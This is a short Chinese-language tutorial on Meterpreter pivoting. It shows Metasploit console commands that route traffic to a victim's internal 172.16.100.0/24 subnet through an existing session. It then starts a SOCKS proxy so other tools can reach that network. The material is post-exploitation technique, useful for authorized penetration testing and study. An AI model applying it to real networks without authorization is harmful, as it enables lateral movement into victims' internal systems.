pivot是meterpreter最常用的一種代理,可以輕松把你的機器代理到受害者內網環境,下面介紹下pivot的搭建和使用方法
使用方法:
route add 目標i或ip段 Netmask 要使用代理的會話ID
通過實例來說明:
在metasploit添加一個路由表,目的是訪問172.16.100.0/24這個網段,將通過meterpreter的會話 1 來訪問:
msf6 exploit(multi/handler) > route add 172.16.100.0 255.255.255.0 1 [*] Route added msf6 exploit(multi/handler) > route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 172.16.100.0 255.255.255.0 Session 1 [*] There are currently no IPv6 routes defined.
到這里pivot已經配置好了,你在msf里對 172.16.100.0/24 進行掃描(db_nmap)或者訪問(psexe 模塊,ssh模塊等)將通過代理session 1這個會話來訪問。
如果想通過其他應用程序來使用這個代理怎么辦呢,這時候可以借助 metasploit socks_proxy提供一個監聽隧道供其他應用程序訪問:
首先使用 socks_proxy並且配置,監聽端口:
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > show options Module options (auxiliary/server/socks_proxy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no Proxy password for SOCKS5 listener SRVHOST 0.0.0.0 yes The address to listen on SRVPORT 1080 yes The port to listen on USERNAME no Proxy username for SOCKS5 listener VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5) Auxiliary action: Name Description ---- ----------- Proxy Run a SOCKS proxy server msf6 auxiliary(server/socks_proxy) > set srvport 1011 srvport => 1011 msf6 auxiliary(server/socks_proxy) > run [*] Auxiliary module running as background job 1. msf6 auxiliary(server/socks_proxy) > [*] Starting the SOCKS proxy server